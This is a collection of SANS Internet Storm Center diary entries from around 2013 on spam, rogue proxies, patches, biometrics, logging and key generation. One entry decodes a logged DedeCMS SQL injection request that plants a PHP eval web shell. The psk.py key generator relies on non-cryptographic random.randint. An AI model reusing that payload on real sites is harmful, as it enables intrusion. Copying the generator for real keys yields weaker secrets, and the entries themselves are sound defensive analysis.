There has been a recent spat of Twitter accounts sending Direct Messages (DM) to others that are either spam or link to malware through shortened URLs. In some cases the accounts sending the DM may have been compromised through weak passwords, a malware infestation on the user's computer, or a third party application not playing nice. Rumours of Twitter having been hacked are also being passed around, I haven't seen any evidence either way. If you have been a victim of your Twitter account tweeting or sending DM without your approval let us know through our contact us page, or comments below. If you have a DM from someone that appears to be spam or has a suspicious link in it please do pass it along.

Let's be careful out there!

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

Information security professionals take very seriously the network perimeter and tend to put in place several devices to enforce access control to network resources like firewalls, IPS, content filtering devices including antimalware functionality and network access control. But there are two specific variables that can increase a lot the risk of external compromises:

• Administrative privileges in desktop computers: Many types of business software do not have implemented the principle of requiring the least privileges. That us why now a significant percentage of companies grant Administrator privileges to users, where their use is not monitored in detail.
• USB device control: Many companies subject to compliance regulations does not allow usage of USB ports at all. However, those companies are a small percent of the total universe and the remaining ones are not willing to implement unpopular measures.

Consider the following scenario: companies with PC accessing through the official Internet access and corporate laptops with 4G access:

There are some circumstances where the CISO might be really unpopular, like the day where the official country's soccer team is playing a decisive match. Of course, the official internet access won't allow the access to the stream and so, people will find "alternate ways" to access it. Since not too many people knows the concept of default gateway and how to change it in the computer without causing themselves a self-inflicted denial of service, There is a very interesting program called delegate, which is a multipurpose proxy and will fit for the need of bypassing the internet access. Since there is a very detailed usage examples page, people can start using it without further difficulty.

Most people in corporate networks are aware that the "proxy parameter" exist, so it is very easy for them to change it and enjoy the "benefits" of free-of-restriction internet.

How can you tell if you have "free proxies" inside your network that use the illustrated scenario? nmap has a plugin that is able to check for open proxies. If you want to check for open proxies inside network 192.168.0.0/24, you can issue the command nmap --script http-open-proxy.nse 192.168.0.0/24. The following figure shows an example result for the discussed scenario:

You should definitely segregate administrator privileges for your users and also disallow usage of 3G an 4G devices when plugged into the corporate network. If you don't have tools for this, you should monitor the usage for the administrator privileges given to your users.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

At the ISC we had a report today from Greg about obfuscated Javascript on the site hxxp://fishieldcorp.com/.  A little research revealed that this site has been infected in the past. Nothing extraordinary, just another run of the mill website infection. 

What did strike me is how the nature of this research has changed  in recent years.  Not so long ago checking out a potentially infected website would have involved VMs or goat machines and a lot of patience and trial and error.  Today there are so many sites that will do the basics for you.  Greg sent us a link to URLQuery which displays a lot of information about a website including the fact that this one is infected.

I am increasingly become a fan of Sucuri for this type of research.  Like URLQuery Sucuri finds this website infected.

Sucuri also provides some other details that are interesting.  A dump of the Javascript code:

In this case what most intrigued me was the blocklist status of the website.

At the time of my review the infection was still being picked up by the various blocklist websites.  Between the time I took this screenshot and when I finished this diary, SiteAdvisor had picked it up and I will assume the others will follow close behind.

Definitely easier than in the past.  Now to find some time to work on that JavaScript.

Have any web based tools you like?  Please pass them on through comments to this diary!

Have a great weekend!

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

Personally, my "DNS Monitoring System" is a bunch of croned shell scripts and nagios, in desperate need of an overhaul. While working on a nice (maybe soon published) script to do this, I was wondering: What is everybody else using?

The script is supposed to detect DNS outages and unauthorized changes to my domains. Here are some of the parameters I am monitoring now:

- changes to the zone's serial number
- changes to the NS records (using the TLD's name servers, not mine)
- changes to MX records
- monitoring a couple critical A and AAAA records (like 'www').

In addition, for zones with DNSSEC enabled:

- does the signature expire soon?
- do all key signing keys have valid DS records with the parent zone?
- did the DS record change?

What else are you monitoring?  What scripts / tools do you use to accomplish this?

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

I came across an article today that demonstrates a compromise of the new Apple 5S fingerprint reader:
http://www.theguardian.com/technology/2013/sep/22/apple-iphone-fingerprint-scanner-hacked#!
http://www.ccc.de/en/updates/2013/ccc-breaks-apple-touchid

In other words, a copy of your fingerprint is your fingerprint.  And as Johannes discussed in the first article on this (https://isc.sans.edu/forums/diary/In+Defense+of+Biometrics/16553/), the screen on your phone is one of the better fingerprint collectors out there !
For me, this brings up both sides of "the fingerprint discussion"

• You can't change your fingerprints - once a real copy of them are compromised, they are compromised forever
• A representation of your fingerprint is stored on the device.  So if the device is lost or stolen, this representation could be used to compromise other things, if they use the same representation of your fingerprint (ie - any other device that uses the same manufacturer's hardware).  Again, once stolen, they are stolen forever.
• After a couple of years, you'll likely trade your phone in for a new one, and today there isn't a way to know that a wipe of the phone wipes the saved representation of your fingerprint
• Your fingerprint may be backed up with your phone backup.  Historically, your phone's backups have been easier to pillage than your phone.
• If your phone is damaged, you may not have a way of wiping it

On the other hand:

• On any given day, using your fingerprint is likely MUCH more secure for you than the 4 digit code you are likely using
• Since your phone code likely matches either your phone number or your bank code, either it's very easy to guess, or compromising it might have other unpleasent consequences for you.

There's lots of discussion on this online, I think we're still waiting on Apple to respond definitively on any of them.

Anyway, none of these arguments are new, we've been round and round on them anytime these last 10 years, since they started putting readers on laptops for login.  What's changed is that there are way more phones than there are laptops, and in most cases the 4 digit unlock code on your phone is all that protects your chequing account, your facebook, paypal, twitter and email accounts.

So, am I using my fingerprints yet?  Not on any of my laptops, but once I upgrade my 4S to the new model, it'll be awfully tempting to take the plunge - I guess I'm still thinking about it.  If Apple would implement a "fingerprint + PIN" two factor authentication solution, it'd be an easier decision.

We welcome your comments in our discussion forum (comment button below).

===============
Rob VandenBrink
Metafore

In my line of work, there is a lot of uses for a random sting of text.  Things like:

• VPN Preshared Keys
• RADIUS or TACACS  "shared secrets"
• Windows Service Account Passwords
• Administrative accounts (Windows local or domain Administrator, in some cases root in *nix)

You get the picture.  Strings that you need to key once, or once per instance.  In most cases, these are strings that after creation, you don't neccesarily need to know what they are, you just need to know how to change them.

With this list of parameters, you'd think that folks would use random characters for these functions right - at least do the random keyboard walk for it?  In my experience, this is almost NEVER the case.  People try spell things - "l3tm31n", D0ntg0th3r3" and the like.  They'll use their Company name, or the street address of their organization, or some other "meaningful" string.  And after using "leet-speak" passwords, they then carefully record the password and save it to a text file, usually on the server that's using the password.  As a pentester, this is a win for me, I don't even need to crack the password, you just gave it away!  As a system administrator, this horrifies me!

So, what to do?  In the past, I've used an excel spreadsheet to generate a random string of "n" characters, selected from a set of characters that do not include the "confusing" ones (Oo01lIiL and so on).   The "randomness" was defined by how long I felt like leaning on the F9 key that day.  After creating the string, I would then try to get my client to NOT write down the string - this almost never works, but it's worth a try.

For today's story, I decided to improve on this a bit, and re-coded it in python.  This was a 5 minute script (as most of mine are), so if you see a way to improve or neaten this up in any way, please - don't be shy - use our comment form.

========================================= psk.py =========================================

from random import randint
import sys
if not (len(sys.argv) == 2):                                           # verify syntax
        print "Syntax PSK LENGTH_OF_PSK"
        exit()

rndstrlen = int(sys.argv[1])                                           # how long is the output string?
outstring=""

chars = "abcedfghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789"       # define the list of valid characters
charlist = list(chars)                                                 # change it to a list for lookups

numchars = len(charlist)  -1                                           # get length of string list, -1 for start from zero

for i in range (0, rndstrlen):
     c = charlist[randint(0,numchars)]                                 # pick a random char from the list
     outstring += c                                                    # append it to outstring

print outstring

==========================================================================================

Running this as "python psk 15" will create a 15 character pseudo-random string:

C:\> python psk.py 15
xnHDCcRGetuswhf

C:\> python psk.py 15
bvDJhrtRC4QMmks

C:\> python psk.py 15
nWChNxBPMVZbaDb

C:\> python psk.py 15
UXbcSm9Bk9RHTWc

C:\> python psk.py 15
uVs34MZuta9PFTk

You can change the values that are permitted to be in the string (to exclude lower case values, or to add special characters) by adding or removing characters in the "chars" string.  Changing the length of the string is as simple as changing the  value in the command line option:

C:> python psk.py 32
pPPhe6Pn9RbGN3gr6UZZfqZYt4ajSfjg

C:> python psk.py 64
xsk9rNaX77UtSNfCGVVgWeEm9xS7mgMwcbx4FaquPz9cpMJFqRC5YYrf5Wyp8mp7

And please, in most cases there is NO reason to write down this password.  Your "windows service password for whichever service" for instance should be changed periodically, but in most cases there is no reason that you should know what it is, you just need to be able to change it. 

Also, if you use this to create a random pre-shared-key for your ste-to-site VPN, emailing it in cleartext is what we call "a bad idea".  Not only is it open for theft as it transits the internet (and both internal networks), it's also stored (likely forever) in your sent mail and in the recipients inbox, and likely in the Exchange Server message store - the whole cleartext data at rest / cleartext data in transit concept should ring a bell, especially if you've been audited for PCI lately.

As always, in these days when brute-forcing is simple, quick and cheap, bigger is in fact better.  For pre-shared keys or "write only" passwords, I generally start at 32 characters and go up from there.  Since you never need to re-key the thing, after it's generated you can cut/paste it and forget it.

I hope that you find this simple bit of code useful.  If you've got a simpler way of getting to the same results, or if you can improve on my quick-and-dirty python, please post to the comment field below!

===============
Rob VandenBrink
Metafore

The Internet Storm Center is beginning to see increased evidence of exploits in the wild regarding Microsoft Security Advisory 2887505.  Accordingly, we're moving the InfoCon up to Yellow.

We received an interesting submission about a strange looking Apache web server log. While the log does not look malicious, after examining it carefully it certainly looks strange, as you can see below:

10.10.10.10 - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109 [snip] HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

The log, as shown below, contains a request to the download.php PHP script with a bunch of parameters that appear to be the same. After decoding %5B and %5D to [ and ], the request becomes a bit more obvious:

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98

The request above contains repeating arrs1[] parameters – PHP treats these as members of an array so this actually creates an array called arrs1 (and later arrs2 as shown in the original log) which contains various numbers. These numbers (99, 102, 103 …) look like ASCII encodings, so the next step to decode this is to push it through a perl one liner that will work on the original log:

$ perl -pe 's/(&arrs(1|2)%5B%5D=)(\d+)/chr($3)/ge' < original.log

10.10.10.10 - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'` HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

And this definitely looks malicious. After a bit of research, it turned out that this is an attack against a known vulnerability in the DedeCMS, a CMS written in PHP that appears to be popular in Asia. This CMS has a pretty nasty SQL injection vulnerability that can be exploited with the request shown above.

The vulnerability exists because the CMS uses the $GLOBALS global variable which is then further propagated to an SQL query. The resulting query, from the decoded attack above, is pretty obvious: the attacker will create a file called 90sec.php which is a very simple backdoor PHP shell that allows the attacker to execute any command with a POST HTTP request that contains the command to be executed in the parameter called guige (highlighted above).

While in this case this was simply a way to transfer an array over a GET request, similar request can also abuse HTTP Parameter Pollution attacks, where a single parameter is added multiple times into GET or POST requests, resulting in potentially unexpected behavior.

Additionally, as you can see in the log at the top, the User Agent string has been set to WinHttp.WinHttpRequest, which indicates that this request was created by a script or an attack tool executed on a Windows machine.

Thanks to our reader for sending the logs, and for being alert about strange looking requests – something everyone should do.

--
@bojanz
Bojan
INFIGO IS

APPLE-SA-2013-09-18-3
An OSX update that fixes a situation where the hostname in a certificate is not checked against the actual hostname.  This vulnerability means that anyone with a valid certificate can impersonate any host - lots of attack applications in this, when combined with MITM or DNS hijack attacks

APPLE-SA-2013-09-18-2
An absolute TON of updates for IOS, which should be no surprise in a new version.  The highlights include updates to the Root Certificates, fixes for code exploit issues from malicious PDF and Movie files, and a bypass for the password retry limit, allowing a malicious app to brute force the device unlock code.
Also some fun fixes for several cross site scripting issues within Webkit (which is the provider for browser functions in IOS)

Attack vectors for these include buffer overflows, misses on bounds checking and some fun kernel mode attacks!

As always, watch for the full details on Apple's Security Update Page, found here ==> http://support.apple.com/kb/HT1222

===============
Rob VandenBrink
Metafore

The amount of press that Apples IOS 7 update has gotten today has had an unintended consequence - everyone seems to be pulling it down the instant they see that it's available.

This is triggering IPS Sensors and causing real DOS conditions due to the traffic involved - an unintended "apple - zooka"

Swa, one of our handlers, indicates that this can be easily resolved for a single broadcast domain by enabling the Apple Caching Service on a single OSX Server in the network.  Clients find it with Bonjour, and a single download services all clients. (thanks for the screenshot Swa)

I'm not sure how this interacts with the Service Discovery features in mDNS - if anyone has details on this we'd appreciate your insight in the comments field for this story!

Generally, just enabling this is enough, but advanced settings for the caching server can be found here ==> http://support.apple.com/kb/HT5590

===============
Rob VandenBrink
Metafore

We continue to see web applications deployed to manage datacenter functions.  And I'm sorry to say, we continue to see security issues in these applications - some of them so simple a quick run-through with Burp or ZAP would red-flag them.

In that theme, today Cisco posts updates to DCNM (Cisco Prime Data Center Network Manager).  The issues resolved are not so simple as I describe above (they are more complex than a simple scan to detect or exploit), but they do involve remote command execution and authentication bypass - two things most folks should have problems with in a Data Center Network Manager.

The advisory is here ==> http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm

As per usual, a valid service contract is required to obtain the update.  My clients do have Cisco contracts, but I'm not sure how thrilled I am that you need to pay maintenance to fix security issues so fundamental.

===============
Rob VandenBrink
Metafore

Apple IOS 7 is available today (just posted in fact). While the major push for this is support for the new iPhone platforms, we can expect functional and security changes that will affect all ios platforms, among them:

• per app licensing
• per app vpn settings
• per app encryption keys
• single signon (What could possibly go wrong with this?! )
• and better MDM (Mobile Device Management) functions - expect upgrades for your corporate MDM platforms sometime real soon, and expect that management will want these applied ASAP!
• More on these features here - http://www.apple.com/ios/business/

 I'm sure several of these new features are worth a story all on their own - stay tuned!

We've all seen the flurry of app updates over the past few weeks, as everyone gets their app ready for the new OS. Before updating, you should check to see that all of your apps will support the new operating system. For instance, I still use Stanza as a reader app for my fiction library. Since it was officially moved to unsupported status by Amazon, I think it's smart for me to (finally) change readers before I upgrade.

This update comes at an interesting time for a couple of my clients. Since going to a BYOD model, they now have thousands of i-devices ontheir networks, unmanaged and for the mostly owned by their users (or their visitors). Ibn most organizations, at just under 1GB the bandwidth overhead of for this update shouldn't be an issue, but one client in my list is in that "thousands of Apple devices" list and is also on my "bandwidth constrained" list. I can see this update affecting their business applications, both by stressing their already maxed out WAN and also by adding to their already over-capacity internet uplink. We're changing their QOS to de-prioritize "all things Apple" for today. Once we can characterize what this update looks like on the network, we'll make the ACL more specific to just deprioritize the update traffic.  Now that the update is posted, I'll be firing up TCPDUMP and doing just that !

===============
Rob VandenBrink
Metafore

Microsoft just released an advisory on an Internet Explorer vulnerability that would allow for remote execution.  The report references public availability of details of his vulnerability.  The long story short, a targetted attack that gets a user to view a malicious webpage (or malicious content on an otherwise safe webpage) could lead to memory corruption that could execute arbitrary code with the permissions of the logged in user.  Two suggested actions are provided by Microsoft, apply the FixIt provided by Microsoft or deploy EMET 3.0/4.0 which provides generalized protection of memory (and probably not a bad idea to deploy anyway).  Note, the FixIt ONLY applies to 32-bit versions of Internet Explorer.

This post will be updated with more details as the situation warrants.

--
John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Consulting

The current discussion about breaking encryption algorithm has one common thread: random number generators. No matter the encryption algorithm, if your encryption keys are not random, the algorithm can be brute forced much easier then theoretically predicted based on the strength of the algorithm. All encryption algorithms depend on good random keys and generating good random numbers has long been a problem.

In Unix systems for example, you will have two random devices: /dev/random and /dev/urandom. "random" usually produces random numbers based on some source of entropy. In Linux, parameters like mouse movements, disk activity and interrupts are used. Older versions of the random number generator used network activity, but since the attacker may be able to affect network activity, this parameter is no longer used. The Linux random number generator was found to be not particularly well implemented, in particular on disk less systems and systems with little user activity, like for example routers [1] .

Recently, some implementations of Linux like OpenWRT where found vulnerable if they are used on MIPS based hardware. The random number generator on these systems uses the number of CPU cycles since reboot as a seed. However, the respective function always returns 0, not the actual number of cycles on MIPS. [2]

Are there better ways to collect random numbers? One of the challenges is to increase the amount of entropy (random events) collected. There are some good attempts to use microphones, cameras and other hard ware devices to improve the pool of entropy. Sadly, there are no simple "standardized" solutions to implement these techniques.

Here are a couple pointers to projects that may help you implement better random number generators:

Using the camera in Windows : http://wcrnd.sourceforge.net
using the sound card in Windows: http://sourceforge.net/projects/trng
Linux camera based random number generator: http://sourceforge.net/projects/lavarnd/
Linux sound card random source: http://code.google.com/p/snd-egd/

testing random number generators: http://www.leidinger.net/FreeBSD/dox/dev_rndtest/html/df/d2a/rndtest_8c_source.html (look for "rndtest" in your Linux distro)

Got any other tips to create good random numbers (cheaply)?

[1] http://www.pinkas.net/PAPERS/gpr06.pdf
[2] https://lists.openwrt.org/pipermail/openwrt-devel/2013-September/021318.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

• MICROSOFT SECURITY BULLETIN MS13-067
  • Security Update for Microsoft Office SharePoint Server 2007 (KB2760589)
• MICROSOFT SECURITY BULLETIN MS13-072
  • Security Update for Microsoft Office 2007 suites (KB2760411)
  • Security Update for Microsoft Office 2010 (KB2767913)
• MICROSOFT SECURITY BULLETIN MS13-073
  • Security Update for Excel 2003 (KB2810048)
  • Security Update for Microsoft Office Excel 2007 (KB2760583)
  • Security Update for Microsoft Office Excel Viewer 2007 (KB2760590)
  • Security Update for Microsoft Office 2007 suites (KB2760588)
• MICROSOFT SECURITY BULLETIN MS13-074
  • Security Update for Microsoft Office 2013 (KB2810009) 64-Bit Edition
•  Non-Security Updates:
  • Update for Microsoft PowerPoint 2010 (KB2553145)
  • Update for Microsoft PowerPoint Viewer 2010 (KB2553351)

If the initial patch worked for you there is no need to do anything.  If your machines went into a install loop for the patch it should now be fixed and you can test and deploy. 

Mark 

David, one of our readers, emailed wih a question - when he tries to interact with a particular print driver, he gets a Java error:

PKIX path validation failed:
java.security.cert.CertPathValidatorException:
Algorithm constraints check failed: MD2withRSA

This error comes up because as of Java 7, MD2 hashing and any RSA hash under 1024 bits are disabled.  Since this is a (very) old printer driver, the fact that it still uses MD2 is not a surprise - but what to do next?

OK - the obvious answer is to upgrade out of the problem - if the driver has an update, apply it.  But how do we get to the interface given the Java situation?  The answer is buried in the Java config files - - edit the file java.securty, which in Windows is found at: "C:\Program Files (x86)\Java\jre7\lib\security"

In this file, you'll find the line:

jdk.certpath.disabledAlgorithms=MD2, RSA keySize < 1024

Edit or comment out this line, and MD2 will work for you again. But don't leave it like this - this enables all those certs with weak hashes, which leaves you open to a world of hurt.  In this case, it gets you access back to the interface so you can upgrade to a newer version.  If there is no newer version, it gives you access until you can upgrade the hardware or app that's causing the problem.

===============
Rob VandenBrink
Metafore

My, how things have changed since 1987 – especially in the world malware!  In that year, the Jerusalem Virus hooked the old DOS Interrupts (int 21h for those who did assembler back in the day) for operation.  Since everything else also used INT 21h, including Netware clients (remember Netware?) and most DOS services, this malware slammed the already slow computers of the day with an additional performance hit.  Once on your system, this one infected all exe’s on the drive, growing them all by a specific number of bytes (depending on the variant).  On Friday the 13th, it then deleted all the EXE’s on the infected system.

If you’re interested, there’s more on this oldie here: http://en.wikipedia.org/wiki/Jerusalem_%28computer_virus%29.  I’d guess that the AV folks all have a page on this one as well.

In today's terms,  there is no point to this “vintage virus”, aside from infecting as many computers and as many executables as possible, then doing the mass-destruction thing when the countdown expires.  Mainly it’s a “because I can” piece of destructive code.

These days, most attacks and malware is all about theft of dollars, credentials or information of some kind.  It’s become a business like any other, and like other businesses “follow the money” is the best way of determining motivation and what’s happening behind any smokescreen involved.  Often we have to follow the packets, or the log entries, or the code along the way, but the end goal and motivation is most often financial.  It’s protecting this target information that keeps us all awake at nights, and drives the entire security effort that we’re all a part of.

Anyway, if you still have a DOS or Windows/9x system (sadly, I’ve still got a client running a pharmaceutical manufacturing system on Win9x), today might be a bad day for you.  But if not, take a minute to think about what we’re protecting, and (as always) what you may have missed.  

Speaking of oldies but goodies, and things missed - it might be a good day to look ahead and deal with a few loose ends in today’s infrastructure:

• think about knocking that last Win2K server out of your infrastructure - moving it to a VM did NOT solve this issue forever
• Or deal with that ticking time-bomb of the XP stations still left in the infrastructure.  Microsoft recently posted an article on the risks of running XP past April 8,2014 (less than 7 months away !! )  http://blogs.technet.com/b/security/archive/2013/08/15/the-risk-of-running-windows-xp-after-support-ends.aspx.  If you think XP has been a bit quiet on the security front lately, consider that this is likely because the bad guys are saving all their zero days up for April 9 of next year.  I know of a few large organizations (>5,000 stations) that have put this off long enough that getting this project planned and done in time might not be possible.  If you are still running XP on April 9, you may end up having to explain to shareholders why your business was partially or mostly offline for the last 10 weeks of Q2 2014 !!

If money is the motivation for many of today's attacks and malware, XP and Win2K are the unlocked doors in the neighborhood - it's time and past time to get these things battened down!
 

===============
Rob VandenBrink
Metafore

It started with a pretty benign question from an ISC reader. But if the corresponding SQL query times out on our sensors, something is probably indeed going on ... The IP addresses listed above have >30'000 domain names associated to them, all of the format as shown below

byqajg2lclo7221tdx511xf21594e06d2bb1166c296c16adf1cbfe1b [ dot ] bizgo.be
byqajg2lclo7221tdx511xf21594e06d2d442d2a296c5ee5188fa2c0 [ dot ] bizgo.be
byqajg2lclo7221tdx511xf21594e06d2df74c3c296c49dd3801615d [ dot ] bizgo.be
byqajg2lclo7221tdx511xf40934e06d2ce119772967b2379df2211a [ dot ] bizgo.be

bizgo is not the only domain used, there are many, but currently concentrated in *.be. The host names seem to be time-based, and are only valid for the briefest of instants. This makes manual analysis somewhat difficult - by the time you have grabbed a sample and are running it in the sandbox, well, the domain name no longer resolves. Consequently, only a handful of malware reports on VirusTotal and Malwr.com so far actually show a real detection, for example

https://malwr.com/analysis/NmQ5NmYwN2EyMTQzNDY3Zjk3MjY0MTRhOTQzMjE2Mjc/
https://malwr.com/analysis/NWFiMGYxY2E1MzVhNDkxOGIxNDAzNTQ4ODNkODU5ZjQ/

and both suggest that a Trojan Downloader is coming from this IP, but otherwise didn't get all that far with the analysis. For the traffic that a sensor of ours captured, the requested file path was /i/last/index.php, which matches Emerging Threat SID 2015475 for a Blackhole landing page.

If you have intel to share on these domains or IPs, please let us know via the contact form, or the comments below.

We have a couple of issues people reported with yesterday's Microsoft patches. Let us know if you experienced any of these issues, and what workaround you applied to get things back to normal:

KB2868116: Takes very long to install. Just sit back and wait (30-45 Minutes). This patch improves the content of warning messages, so it is somewhat security relevant, but does not patch an actual vulnerability.

KB2817630: Causes Outlook to loose all folders. No workaround other then removing the patch. This was not a security patch.

We will add to this list as we confirm any other issues. So far, there are some reports of the system re-applying the same patch over and over, but there are just one or two users reporting this, and in some cases the patch that causes it isn't identified.

------

Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

There is a new iPhone and it comes with a finger print sensor! What better reason to talk a bit about biometric. In the good old days before Defcon and Wardriving, Biometrics had an ambiance of "high security". Remember the James Bond movie where they cut out a guy's eye to bypass a retina scanner? Those days are long gone. Now we have seen fingerprint and facial recognition systems being bypassed by simple printouts of the fingerprint or face, or rubber molds of fingerprints being used instead of the real thing.

So how meaningful is a fingerprint sensor these days? The right answer is of course: It depends. First on the quality of the sensor, secondly of the software used to analyze the acquired data, and finally the alternative authentication methods it replaces or suplements.

During enrollment, the sensor acquires a reference image of the fingerprint. This image is then analyzed, and certain parameters are extracted from the image. It is these parameters, not the original image, that will be used to compare later authentication attempts. Of course, no two images are quite alike. It may not be possible to identify all the parameters, or some additional characteristics may be discovered that were not visible in the reference scan. The result is that the software has to allow for some variability. For low quality sensors, this variability can be quite large, leaving you with only few distinct features. The result is the same as having a bad password: Many different users will end up with the same "fingerprint" as far as the sensor is concerned.

So what does this mean for the iPhone, or mobile device authentication in general? The problem with mobile device authentication has always been the fact that it is difficult for the user to enter complex passwords on a small keyboard. The result is that most users choose short numeric PINs. There have been a couple of other attempts, for example the Android "pattern" login and the use of cameras for facial recognition. The facial recognition usually suffers from bad sensor quality and from very variable lighting. The pattern login is a pretty neat idea, but I think it hasn't been tested sufficiently to figure out how much patterns users choose actually differ.

There is one thing Apple appears to have done right: The fingerprint data stays on the phone, and is not backed up to any cloud service. If this information got lost, an attacker could use it to reconstruct a duplicate of the finger, which in turn could be used for biometric identification even beyond the iPhone itself. 

As far as the quality of the image sensor and software: We will have to wait for it to be tested once the phone is released. It probably does not include more advanced feat rues like measuring the users body temperature or observing blood flow. But I hope it will be better then a 4 digit pin.

One easy improvement: Make it "real two factor" by allowing users to require a PIN/Password in addition to the fingerprint. Could they have done better then a fingerprint? There are a few different common biometric sensors: Facial recognition, Fingerprint, Weight/Height, retina scans and iris scans. Fingerprints are probably best considering the price of the sensor and the difficulty to acquire the data.

Finally: There is probably one real big vulnerability here. A stolen iPhone is likely covered in the user's fingerprints. It shouldn't be too hard for an attacker to lift a finger print off the phone itself to bypass the sensor.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 

This is a "guest diary" submitted by Tom Webb. We will gladly forward any responses or please use our comment/forum section to comment publically. Tom is currently enrolled in the SANS Masters Program.

Rsyslog has some very useful features when building a centralized syslog system. If you are not currently centralizing your logs or have not organized them in an efferent way for analysis, this post will get you started in the right direction.  

To understand how to create a filter, you must understand the basic breakdown of the message format. Below is a visual representation of a basic log. The rawmsg is the entire syslog line. If you use this in your filter, it will check the entire line for a match. The hostname field can match a name or an IP address. The programname field normally lists the application that created the log and the msg field is anything after the programname. 

|-------------------------------------rawmsg--------------------------------------|

|-----Date-----|-----Hostname----|programname|-----------------msg----------------|  

Aug 14 02:38:01  SIFT-Workstation  rsyslogd:      rsyslogd's userid changed to 101

Client logs

To setup all logs for a Linux system to forward to your central log server simply change the /etc/rsyslog.conf file and replace the IP address of your syslog server with (192.168.1.1) in following line:

*.* @192.168.1.1:514

If you only want to forward a type of application logs to syslog, be more specific about what you want to send. If you do not need all the information in a log, filter out the noise. This will save disk space and speed up processing. In this example, we are only sending apache logs to the server. 

If $programname contains ‘apache’ then @192.168.1.1:514

To send the logs via UDP use one ‘@’ sign and to send the logs via TCP use two ‘@@’ signs.

If $progrmname contains ‘apache’ then @@192.168.1.1:514

Organizing Logs

Once you have several devices reporting to your syslog server, you will need to break the logs into different files to make analysis easier. Most often, you will want to group logs by application. Some of the common operators for filtering are contains, isequal, and startswith.

If you want rsyslog to stop process the line once you have a match, use & ~ on the next line. This prevents the line from being entered into multiple files (e.g. /var/log/my-log and /var/log/syslog).

To place all logs from one IP address into a single log, use the below example. It takes anything from the IP 10.10.41.12 and adds it to the /var/log/mail.log. 

if $fromhost-ip == '10.10.41.12' then /var/log/mail.log

&~

For devices in a cluster, you will likely want both device logs in the same file. In the following example both IP 10.10.10.3 and 10.10.10.4 logs are placed into the /var/log/firewall.log. 

if ($fromhost-ip == '10.10.10.3' or  $fromhost-ip == '10.10.10.4') 

Use a partial IP match for lots of devices on a couple of subnets. In this example, anything that has a 10.20.0 address or 10.30.0 is placed into /var/log/load-balance.log. Rsyslog cannot use CIDR notation for subnets, but in most cases, this is a decent replacement.

if ($hostname contains '10.20.0' or $hostname contains '10.30.0') then/var/log/load.log

To create a log for all authentications, the rule below will take any message that contains ‘auth’ and place it into the /var/log/remote-auth.log file.

if $msg contains 'auth' then /var/log/remote-auth.log

A more complex filter to match both authentications and the word fail, use the below example.

If $msg contains ‘auth’ and $msg contains ‘fail’ then /var/log/remote-fail.log

Rsyslogs support very complex logic and syntax. For more information, visit the following links.

http://www.rsyslog.com/doc/rsyslog_conf_filter.html

http://www.rsyslog.com/doc/property_replacer.html

--

Tom Webb

Our regular readers know this, but on Patch Tuesday aka Black Tuesday we get a bit wider audience and hence it's worth repeating it even more:

Do not forget to also patch your Macs!

E.g. a Trojan was recently discoverd that targets Macs with unpatched java flaws. See the Intego writeup.
Not only that, Microsoft Office, Adobe Flash, Shockwave, Reader and/or Acrobat all need to get updated too.

--
Swa Frantzen

It's going to be a busy reboot Wednesday it seems:

• Wireshark 1.8.10 and 1.10.2 have been released today
• Java 7u40 has been released today
  Thanks Neil for reporting it the first to us.

--
Swa Frantzen

Overview of the September 2013 Microsoft patches and their status.

--
Swa Frantzen

Adobe released their September 2013 Black Tuesday bulletins:

--
Swa Frantzen

Endpoint Security

What is the "Endpoint"?

The SSL Infrastructure

So what should I do?

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Sophos has reported a combination of vulnerabilties that can be used to perform a remote privilege escalation and gain unauthorised privileged access to the the device.  Details can be found here http://www.sophos.com/en-us/support/knowledgebase/119773.aspx . 

If automatic updating is enabled the fix should be applied without further intervention. 

Mark H

Microsoft released its pre-announcement for the upcoming patch Tuesday. The summary indicates 14 bulletins total, 4 are critical all with remote code execution and 10 Important with a mix of remote code execution, Denial of Service and elevation of privileges. The announcement is available here.

[1] http://technet.microsoft.com/en-us/security/bulletin/ms13-sep

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

I peruse through my spam folder periodically looking for anything out of the ordinary. I also examine quite closely email that are obviously spam that make it through to my inbox. This one in fact reads a lot like a job application, or a business promotion  attempt gone wrong. Unlike a job application it was not addressed to anyone in particular, and was in fact sent to the SANS Internet Storm Center Handlers distribution list. The fact that the handlers are on a spam list I suppose is not surprising. What I find odd is that this person who is looking for work bought a list for the purpose of spamming it! He did not attach a resume (unlike spammer Bernard Shifman) however did place a link to his LinkedIn profile so that the recipients of his spam can read all about his having achieved his MBA. Which made me wonder if they teach spamming at college or university these days? My thoughts on the subject are that spamming is not the way to go when marketing yourself or your business. Also I am fairly certain SANS would not hire a spammer as a 'business analyst'. The handlers list has never been used to advertise any job openings. Which really has me wondering where he got it? Also where would he get the idea that spamming random people on the Internet would help his job search?
